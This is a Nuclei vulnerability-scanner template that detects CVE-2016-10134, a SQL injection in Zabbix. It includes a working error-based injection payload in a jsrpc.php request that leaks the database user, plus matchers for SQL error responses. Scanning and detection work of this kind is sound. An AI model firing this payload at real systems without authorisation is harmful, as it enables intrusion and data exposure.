nuclei-templates/cves/2016/CVE-2016-10134.yaml

35 lines
1.1 KiB
YAML

id: CVE-2016-10134
info:
name: SQL injection vulnerability in zabbix "latest.php"
author: princechaddha
severity: critical
description: SQL injection vulnerability in Zabbix before 2.2.14 and 3.0 before 3.0.4 allows remote attackers to execute arbitrary SQL commands via the toggle_ids array parameter in latest.php.
reference:
- https://github.com/vulhub/vulhub/tree/master/zabbix/CVE-2016-10134
- https://nvd.nist.gov/vuln/detail/CVE-2016-10134
tags: cve,cve2016,zabbix,sqli
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2016-10134
cwe-id: CWE-89
requests:
- method: GET
path:
- "{{BaseURL}}/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)::"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Error in query [INSERT INTO profiles (profileid, userid'
- 'You have an error in your SQL syntax'
condition: and
- type: status
status:
- 200